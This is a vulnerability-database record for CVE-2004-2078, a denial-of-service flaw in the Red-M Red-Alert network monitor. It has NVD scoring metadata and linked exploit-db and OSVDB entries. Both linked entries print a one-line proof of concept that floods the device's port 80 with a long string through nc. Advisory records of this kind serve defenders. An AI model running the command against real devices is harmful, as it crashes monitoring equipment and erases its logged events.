{"id": "CVE-2004-2078", "bulletinFamily": "NVD", "title": "CVE-2004-2078", "description": "Red-M Red-Alert 2.7.5 with software 3.1 build 24 allows remote attackers to cause a denial of service (reboot and loss of logged events) via a long request to TCP port 80, possibly triggering a buffer overflow.", "published": "2004-02-09T05:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2078", "reporter": "cve@mitre.org", "references": ["http://www.securiteam.com/securitynews/5SP0C0KC0A.html", "http://www.osvdb.org/3891", "https://exchange.xforce.ibmcloud.com/vulnerabilities/15086", "http://secunia.com/advisories/10832", "http://marc.info/?l=full-disclosure&m=107635119005407&w=2", "http://genhex.org/releases/031003.txt", "http://securitytracker.com/id?1009001", "http://www.securityfocus.com/bid/9618", "http://www.securityfocus.com/archive/1/353211"], "cvelist": ["CVE-2004-2078"], "type": "cve", "lastseen": "2019-05-29T18:08:04", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "79f39a01e7609d409221b82a190dfe90"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "5ff53a5f60a6f9743c93360caab47221"}, {"key": "cpe23", "hash": "7fd4653abe19b422af7f1e2daa043df4"}, {"key": "cvelist", "hash": "0433f8a4f5c5ef530ca2e75ea8415f43"}, {"key": "cvss", "hash": "41b62a8aa1ee5c40897717cadc30784a"}, {"key": "cvss2", "hash": "85fc9715d07b57d9e72056856b007c7b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "fdd2f542b7f00da37f3bc35b172001ed"}, {"key": "href", "hash": "d70f45f2280248ac2583513df779cddb"}, {"key": "modified", "hash": "523ab2b584257b356b93ab54fd2d1554"}, {"key": "published", "hash": "c6e2f2250b1be85852636cb78769381a"}, {"key": "references", "hash": "f5a7f29f7e6c293a40f37d2c09f7f64d"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "1641383b69dbb8050e47cf58e16ea1eb"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "9a52e9f88a2e31dc7853c9878fd75fcd3ffc946e5da1d8d543a2ad3e066ea370", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:3891"]}, {"type": "exploitdb", "idList": ["EDB-ID:23672"]}], "modified": "2019-05-29T18:08:04"}, "score": {"value": 6.1, "vector": "NONE", "modified": "2019-05-29T18:08:04"}, "vulnersScore": 6.1}, "objectVersion": "1.3", "cpe": ["cpe:/a:red-m:red-alert:2.7.5_v3.1_build_24", "cpe:/h:red-m:red-alert:2.7.5_v3.1_build_24"], "affectedSoftware": [{"name": "red-m red-alert", "operator": "eq", "version": "2.7.5_v3.1_build_24"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:h:red-m:red-alert:2.7.5_v3.1_build_24:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-02-02T21:32:14", "bulletinFamily": "exploit", "description": "Red-M Red-Alert 3.1 Remote Vulnerabilities. CVE-2004-2078. Dos exploit for hardware platform", "modified": "2004-02-09T00:00:00", "published": "2004-02-09T00:00:00", "id": "EDB-ID:23672", "href": "https://www.exploit-db.com/exploits/23672/", "type": "exploitdb", "title": "Red-M Red-Alert 3.1 - Remote Vulnerabilities", "sourceData": "source: http://www.securityfocus.com/bid/9618/info\r\n\r\nProblems in various abilities have been identified in the Red-M Red-Alert network monitors. Because of this issues, an attacker may be able to crash a vulnerable device and eliminate logs, gain unauthorized access to the administrative interface, or partially evade detection by an affected device.\r\n\r\n$ perl -e 'print \"a\"x1230 . \"\\r\\n\\r\\n\"| nc <device ip> 80", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23672/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "description": "## Vulnerability Description\nRed-Alert contains a flaw that may allow a remote denial of service. The issue is triggered when a very long string is sent to port 80, and will result in loss of availability for the platform.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Red-M has released a patch to address this vulnerability.\n## Short Description\nRed-Alert contains a flaw that may allow a remote denial of service. The issue is triggered when a very long string is sent to port 80, and will result in loss of availability for the platform.\n## Manual Testing Notes\nperl -e 'print \"a\"x1230 . \"\\r\\n\\r\\n\"| nc <device ip> 80 \n## References:\nVendor URL: http://www.red-m.com/\nVendor URL: http://www.red-m.com\nSecurity Tracker: 1009001\n[Secunia Advisory ID:10832](https://secuniaresearch.flexerasoftware.com/advisories/10832/)\n[Related OSVDB ID: 3953](https://vulners.com/osvdb/OSVDB:3953)\n[Related OSVDB ID: 3952](https://vulners.com/osvdb/OSVDB:3952)\nOther Advisory URL: http://genhex.org/releases/031003.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-02/0233.html\nISS X-Force ID: 15086\n[CVE-2004-2078](https://vulners.com/cve/CVE-2004-2078)\nBugtraq ID: 9618\n", "modified": "2004-02-08T07:08:46", "published": "2004-02-08T07:08:46", "href": "https://vulners.com/osvdb/OSVDB:3891", "id": "OSVDB:3891", "type": "osvdb", "title": "Red-Alert Long String DoS ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}